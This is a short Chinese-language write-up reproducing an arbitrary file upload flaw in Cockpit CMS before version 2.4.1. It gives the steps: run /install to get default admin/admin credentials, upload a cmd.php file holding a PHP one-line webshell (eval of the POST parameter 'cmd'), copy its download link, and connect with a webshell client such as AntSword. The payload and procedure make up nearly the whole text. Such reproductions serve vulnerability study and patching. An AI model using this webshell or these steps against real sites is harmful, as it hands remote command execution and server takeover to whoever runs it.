一、漏洞概述
cockpit在2.4.1版本之前存在任意文件上传漏洞,通过在浏览器中打开/install来运行安装。
二、影响范围
cockpit < 2.4.1
三、访问页面
四、漏洞复现
1、访问/install来运行安装,获得账号密码admin/admin登录
2、制作cmd.php文件,上传php一句话木马。
<?php @eval($_POST['cmd']);?>
3、查看上传的文件路径,点击下载
4、选择下载的文件,右键复制下载连接。
5、使用蚁剑等工具进行连接